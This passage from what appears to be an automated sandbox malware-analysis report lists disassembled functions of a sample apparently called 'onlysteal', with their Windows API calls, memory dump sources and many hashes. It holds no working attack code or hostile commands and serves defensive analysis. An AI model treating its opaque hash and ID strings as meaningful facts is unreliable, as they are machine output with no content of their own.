                                      • Opcode Fuzzy Hash: 115df40709ae37743bd43f9554f0957e93424ef26a586cdf72f7a654ae572435
                                      • Instruction Fuzzy Hash: 5A3148B1924209AFCF15DF98C945AEEBBF6BF08304F10046AE845A7251CB329E75CF64
                                      Function 00239DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,002373BC,?,?,?,00000000), ref: 00239DBC
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00239E70
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: 8a1414f59be81c11c771b81443aa1b87b9efacd735a543e8f5c90ab7a68e26f5
                                      • Instruction ID: 663b209399d141a6d88117c693087bab999554cd1054200c652838d73cc22dc0
                                      • Opcode Fuzzy Hash: 8a1414f59be81c11c771b81443aa1b87b9efacd735a543e8f5c90ab7a68e26f5
                                      • Instruction Fuzzy Hash: 21210471268346AFC714DF74C892AABBBE4AF56304F08485DF4C583141D3A8D9ACCB61
                                      Function 0023966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00239F27,?,?,0023771A), ref: 002396E6
                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00239F27,?,?,0023771A), ref: 00239716
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 5449d33bc553474926bf95dc6079cdd1faf8f559a7ece4bd9075461cb68fba58
                                      • Instruction ID: 5c4085ba7d5d814c1b392f99d3b0ab952bd51af4e9f4af999650be7263478be7
                                      • Opcode Fuzzy Hash: 5449d33bc553474926bf95dc6079cdd1faf8f559a7ece4bd9075461cb68fba58
                                      • Instruction Fuzzy Hash: D221C4B15103456FE3308E65CC8AFB7B7DCEB4A324F104A19FA95C21D1C7B4A8948E31
                                      Function 00239E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00239EC7
                                      • GetLastError.KERNEL32 ref: 00239ED4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 2fcb6dab7b69cc6efe34515b5bc98a112fd92a1d7d4ae3a605ce83e882d4f3ba
                                      • Instruction ID: 28c9a3f70aea8fd8e0067a52256d9158aeeef56a89f808b117346b0ae6f5a230
                                      • Opcode Fuzzy Hash: 2fcb6dab7b69cc6efe34515b5bc98a112fd92a1d7d4ae3a605ce83e882d4f3ba
                                      • Instruction Fuzzy Hash: C7110CB1620705ABD734CA28CC45BA6B7ECAF46370F50462AE553D26D0D7F0EDA9C760
                                      Function 00258E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00258E75
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00271098,002317CE,?,?,00000007,?,?,?,002313D6,?,00000000), ref: 00258EB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: 7a5566c7f837d646d2e55c7b17ad62d29ab9e3091c605488563a4899fa1f9419
                                      • Instruction ID: 01cfb0c86ced7c8e3d3e98226133dc959d0a351f60d8e85b54fc70a5f03f2025
                                      • Opcode Fuzzy Hash: 7a5566c7f837d646d2e55c7b17ad62d29ab9e3091c605488563a4899fa1f9419
                                      • Instruction Fuzzy Hash: 51F06832631116A6DB216E256C06B6F37789F81B73F144116FD18B6191DFF0DD2889AC
                                      Function 0024109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 002410AB
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 002410B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 43ec0cb22af6fc48a0a1734a29ed00936f9d91dcdf9cdc02961438a959f4cfec
                                      • Instruction ID: 8369ad699f9d5fe793b52518d607d54005589e83eb80f278ecca3973eaf5c873
                                      • Opcode Fuzzy Hash: 43ec0cb22af6fc48a0a1734a29ed00936f9d91dcdf9cdc02961438a959f4cfec
                                      • Instruction Fuzzy Hash: ECE0D872F20146E7CF0DCBB49C099EB73DDEB442043109175E803D3101F970DE994660
                                      Function 0023A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A501
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A532
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_wcslen
                                      • String ID:
                                      • API String ID: 2673547680-0
                                      • Opcode ID: b76d2d8adced1a8158df387413c470f15d2870993a599a8b982cfe43f1b11dfc
                                      • Instruction ID: 6f819e4f46a138f5ed0325012666d49976c270c84d888020db0b54f4ef909f07
                                      • Opcode Fuzzy Hash: b76d2d8adced1a8158df387413c470f15d2870993a599a8b982cfe43f1b11dfc
                                      • Instruction Fuzzy Hash: B8F0307226011A7BDF015F60DC45FDA376DBB04385F448061B945D5160DB71DAA8DB50
                                      Function 0023A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNELBASE(000000FF,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641,000000FF), ref: 0023A1F1
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0023977F,?,?,002395CF,?,?,?,?,?,00262641), ref: 0023A21F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DeleteFile$_wcslen
                                      • String ID:
                                      • API String ID: 2643169976-0
                                      • Opcode ID: 8469cb6ed491ecc2b2c15870f6060d400be97e94f125a9f300843fac5ebeb0cf
                                      • Instruction ID: a2858e44e65bad01d85528bb0044330ff4c441e25672db51a9b8d886f74e73cd
                                      • Opcode Fuzzy Hash: 8469cb6ed491ecc2b2c15870f6060d400be97e94f125a9f300843fac5ebeb0cf
                                      • Instruction Fuzzy Hash: 47E092711602196BEB019F60EC85FEA375CBB08385F484021BD44D2050EB61DEA8DA60
                                      Function 0024AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00262641,000000FF), ref: 0024ACB0
                                      • CoUninitialize.COMBASE(?,?,?,?,00262641,000000FF), ref: 0024ACB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: 7da4031ecdb6b4e2c99d6de2690333943a4d02aa25f7bfc08b0ec886890d042b
                                      • Instruction ID: 4fff32548c823414831af8d52f75113cb71a65eeb900423b6dddcbee1f672a9c
                                      • Opcode Fuzzy Hash: 7da4031ecdb6b4e2c99d6de2690333943a4d02aa25f7bfc08b0ec886890d042b
                                      • Instruction Fuzzy Hash: 00E06572544650EFCB00DB58EC0AB45FBACFB48B20F004266F416D3760CB746C50CA90
                                      Function 0023A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,0023A23A,?,0023755C,?,?,?,?), ref: 0023A254
                                        • Part of subcall function 0023BB03: _wcslen.LIBCMT ref: 0023BB27
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0023A23A,?,0023755C,?,?,?,?), ref: 0023A280
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AttributesFile$_wcslen
                                      • String ID:
                                      • API String ID: 2673547680-0
                                      • Opcode ID: a931ee7417ba04d4c8271124f9cbb54e3dac337c614b3c95e182b8e739652d98
                                      • Instruction ID: 3df2fd5f0c75361dc59eb8e682e080ac0c9419ea55e5dc8ab830a9a5fcb13eff
                                      • Opcode Fuzzy Hash: a931ee7417ba04d4c8271124f9cbb54e3dac337c614b3c95e182b8e739652d98
                                      • Instruction Fuzzy Hash: 07E092729101245BCB11EF64DC09BD9B75CAB083E1F044271FE84E3190D770DE54CAA0
                                      Function 0024DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 0024DEEC
                                        • Part of subcall function 00234092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002340A5
                                      • SetDlgItemTextW.USER32(00000065,?), ref: 0024DF03
                                        • Part of subcall function 0024B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0024B579
                                        • Part of subcall function 0024B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024B58A
                                        • Part of subcall function 0024B568: IsDialogMessageW.USER32(00010438,?), ref: 0024B59E
                                        • Part of subcall function 0024B568: TranslateMessage.USER32(?), ref: 0024B5AC
                                        • Part of subcall function 0024B568: DispatchMessageW.USER32(?), ref: 0024B5B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                      • String ID:
                                      • API String ID: 2718869927-0
                                      • Opcode ID: 9f82cab54105c32e2a87ead5a1f7f2f99b2bb7587052d36a8feda1c023a99a82
                                      • Instruction ID: d49a56051f5f95e64676695e459056712f02b5fbc31e1af9b41f6ec499eb6b4f
                                      • Opcode Fuzzy Hash: 9f82cab54105c32e2a87ead5a1f7f2f99b2bb7587052d36a8feda1c023a99a82
                                      • Instruction Fuzzy Hash: 8DE092B651025826DF02AB60EC0EF9E3BAC5B05785F440852B208DA0B2DA78EA608F61
                                      Function 0024081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00240836
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0023F2D8,Crypt32.dll,00000000,0023F35C,?,?,0023F33E,?,?,?), ref: 00240858
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 31aa459f8e0df8ee6e1abd9b2430bc3a0a64aed4094cd6a321906c009a3213ad
                                      • Instruction ID: b4ba480f3188fc401499648c6adb55ba6e39881e9540d6b2d552a7914416ed17
                                      • Opcode Fuzzy Hash: 31aa459f8e0df8ee6e1abd9b2430bc3a0a64aed4094cd6a321906c009a3213ad
                                      • Instruction Fuzzy Hash: BAE012764101686ADB11AB94EC49FDA77ACAF09391F044065B645D2005DAB4DA948BA0
                                      Function 0024A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0024A3DA
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0024A3E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: 815be5c9c29450170ff3e440ad9ffc2ad14f6ec2fb809347e022d4052d514581
                                      • Instruction ID: 161a508754476d51b058820d81e9df38f06828e808fc7b8a0d1558814cf23dd1
                                      • Opcode Fuzzy Hash: 815be5c9c29450170ff3e440ad9ffc2ad14f6ec2fb809347e022d4052d514581
                                      • Instruction Fuzzy Hash: 7BE06D71920208EBDB14DF45C40069ABBE8FB04364F10805AA88693200E3B0AE10DB91
                                      Function 00252B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00252BAA
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00252BB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                      • String ID:
                                      • API String ID: 1660781231-0
                                      • Opcode ID: 35452f6632b9daf497019f322bd9b95abf7ac3f801f75c7f229610eaa5b0db6d
                                      • Instruction ID: 5c3a86628826e029e98f0e4e09ecf6c7226299c0d07ce8716abcd807aca1dcfb
                                      • Opcode Fuzzy Hash: 35452f6632b9daf497019f322bd9b95abf7ac3f801f75c7f229610eaa5b0db6d
                                      • Instruction Fuzzy Hash: 28D0A93A174202E94C14AE7028066583355AF53BBB7E0628AEC20854C1EF70807CA81E
                                      Function 002312F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 58ff7188110156a1716f9e75adc34a4ef0980984936859b35dea1f05037d7aef
                                      • Instruction ID: fccb3d8372275bd067f283cdcc510909ca16111726313f63f720b04c0a5bd0e5
                                      • Opcode Fuzzy Hash: 58ff7188110156a1716f9e75adc34a4ef0980984936859b35dea1f05037d7aef
                                      • Instruction Fuzzy Hash: 06C0123605C200BECB018BB4EC0DC2BBBA8ABA5316F04C90AB0A9C0070C239C110DB11
                                      Function 00231A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 7c029af2081cd22823dbfd4bdc98e1cfc7184da082b4275dde896a71ab73a1b8
                                      • Instruction ID: 6e107a7d9be5ba050bbc453e1edde5e87997590f4d689af45f63467b1067877f
                                      • Opcode Fuzzy Hash: 7c029af2081cd22823dbfd4bdc98e1cfc7184da082b4275dde896a71ab73a1b8
                                      • Instruction Fuzzy Hash: 95C1E4B0A202559FEF14CF28C494BA97BA6AF16314F0845BAEC45DF382DB709D74CB61
                                      Function 00233BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: c71d9ae9bec8d4f1f0018807c3f425d3041743def89afca78fcbd0ec44dcb89f
                                      • Instruction ID: baff7fa7ac63af3fc7e26da145723e1c2c20b5d290cb856620008c8728f137b1
                                      • Opcode Fuzzy Hash: c71d9ae9bec8d4f1f0018807c3f425d3041743def89afca78fcbd0ec44dcb89f
                                      • Instruction Fuzzy Hash: 1D71E2B1120B859EDB35DF70C8459E7B7E9AF14301F40492EF5EB87241DA32AAA8CF11
                                      Function 00238284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                      Download Yara Rule
